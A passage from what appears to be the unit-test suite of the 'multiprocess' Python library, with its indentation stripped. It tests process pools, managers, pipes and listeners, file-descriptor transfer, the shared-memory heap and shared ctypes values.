indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def _test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(1000)))
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=53)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
self.assertRaises(ValueError, multiprocessing.Pool, -1)
self.assertRaises(ValueError, multiprocessing.Pool, 0)
p = multiprocessing.Pool(3)
self.assertEqual(3, len(p._pool))
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
self.assertLess(join.elapsed, 0.5)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with multiprocessing.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
@unittest.skipIf(True, "fails with is_dill(obj, child=True)")
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
raise AssertionError('expected RuntimeError')
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
@unittest.skipIf(True, "fails with is_dill(obj, child=True)")
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def _test_unpickleable_result(self):
from multiprocess.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocess.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# If the manager process exited cleanly then the exitcode
# will be zero. Otherwise (after a short timeout)
# terminate() is used, resulting in an exitcode of -SIGTERM.
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
manager.shutdown()
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocess import resource_sharer
resource_sharer.stop(timeout=5)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
heap._lock.acquire()
self.addCleanup(heap._lock.release)
for L in list(heap._len_to_seq.values()):
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, foo, arr, string):
x.value *= 2
y.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0)
bar = copy(foo)
foo.x = 0
foo.y = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
#
#
#
